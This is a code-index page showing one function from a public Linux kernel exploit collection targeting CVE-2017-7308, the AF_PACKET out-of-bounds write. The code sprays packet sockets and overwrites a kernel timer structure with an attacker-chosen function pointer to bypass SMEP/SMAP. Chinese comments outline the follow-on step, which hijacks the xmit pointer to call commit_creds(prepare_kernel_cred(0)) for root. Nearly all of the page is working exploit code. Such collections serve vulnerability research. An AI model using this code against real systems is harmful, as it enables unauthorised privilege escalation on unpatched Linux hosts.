MCPcopy Create free account
hub / github.com/bsauce/kernel-exploit-factory / oob_timer_execute

Function oob_timer_execute

CVE-2017-7308/exploit.c:203–223  ·  view source on GitHub ↗

(1) 绕过SMEP/SMAP: 覆盖 packet_sock->rx_ring->prb_bdqc->retire_blk_timer

Source from the content-addressed store, hash-verified

201}
202// (1) 绕过SMEP/SMAP: 覆盖 packet_sock->rx_ring->prb_bdqc->retire_blk_timer
203void oob_timer_execute(void *func, unsigned long arg) {
204 oob_setup(2048 + TIMER_OFFSET - 8);
205
206 int i;
207 for (i = 0; i < 32; i++) {
208 int timer = packet_sock_kmalloc();
209 packet_sock_timer_schedule(timer, 1000);
210 }
211
212 char buffer[2048];
213 memset(&buffer[0], 0, sizeof(buffer));
214
215 struct timer_list *timer = (struct timer_list *)&buffer[8];
216 timer->function = func;
217 timer->data = arg;
218 timer->flags = 1;
219
220 oob_write(&buffer[0] + 2, sizeof(*timer) + 8 - 2);
221
222 sleep(3);
223}
224// (2) 提权: 覆盖packet_sock的xmit函数指针,它会在发送数据时被调用,在关闭SMEP后返回到用户空间执行commit_creds(prepare_kernel_cred(0))实现提权
225void oob_id_match_execute(void *func) {
226 int s = oob_setup(2048 + XMIT_OFFSET - 64);

Callers 1

mainFunction · 0.85

Calls 4

oob_setupFunction · 0.85
packet_sock_kmallocFunction · 0.85
oob_writeFunction · 0.70

Tested by

no test coverage detected